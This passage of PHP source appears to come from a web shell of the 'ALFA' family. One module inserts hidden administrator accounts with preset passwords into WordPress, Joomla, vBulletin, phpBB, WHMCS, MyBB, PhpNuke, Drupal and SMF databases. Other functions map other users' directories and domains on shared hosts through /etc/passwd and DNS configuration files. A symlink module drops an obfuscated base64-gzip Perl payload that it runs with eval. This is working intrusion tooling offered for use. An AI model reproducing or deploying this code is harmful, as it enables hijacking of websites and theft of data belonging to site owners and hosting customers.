}
$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){

echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
$sole =@mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis =@mysqli_fetch_assoc($solevisible);
$res = $solevis['id'];
}
$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){

echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());
$pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
$pw_col = @mysqli_num_rows($pw_col);
$adm_perm = "16744444";
if($pw_col > 0){
$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
}else{
$adm_perm = "2143256444";
$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','$admin','\$2y\$10\$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','$SQL','".date('Y-m-d')."','".time()."','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
}
$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if($sole == 1){
$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['userid'];
}
$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','".$adm_perm."')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){

echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5('solevisible');
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');
}
}
}
if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){

echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000','tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){

echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){

echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa7'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5($pwd);
$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){

echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
 );
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
$getDescuid = @mysqli_fetch_assoc($getDescuid);
$getDescuid = $getDescuid['uid'];
$getdescuid = $getDescuid++;
$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if ($sole == 1){$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['uid'];
}
$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}

if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){

echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 );
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$setpwAlg = sha1(strtolower($admin) . 'solevisible');
$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
echo "</div>";
alfafooter();
}
function alfaMakePwd(){
if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
return "/home/{user}/public_html/";
}
$document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
$public = end($document);
array_pop($document);
array_pop($document);
$path = implode("/", $document) . "/{user}/" . $public;
return $path;
}
function alfaGetDomains($state = false){
$state = "named.conf";
$lines = array();
$lines = _alfa_file('/etc/named.conf');
if(!$lines){
$lines = @scandir("/etc/valiases/");
$state = "valiases";
if(!$lines){
$lines = @scandir("/var/named");
$state = "named";
if(!$lines && $state){
$lines = _alfa_file('/etc/passwd');
$state = "passwd";
}
}
}
return array("lines" => $lines, "state" => $state);
}
function alfaCreateParentFolder(){
$parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;
if(!@is_dir($parent)){
@mkdir($parent, 0755, true);
}
}
function alfasymlink(){
alfahead();
AlfaNum(9,10);
alfaCreateParentFolder();
@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
$sympath = alfaMakePwd();
@mkdir('cgialfa',0755);
@chdir('cgialfa');
alfacgihtaccess('cgi');
$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;my $alfa_data="'.__ALFA_DATA_FOLDER__.'";eval(Compress::Zlib::memGunzip(decode_base64("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")));';
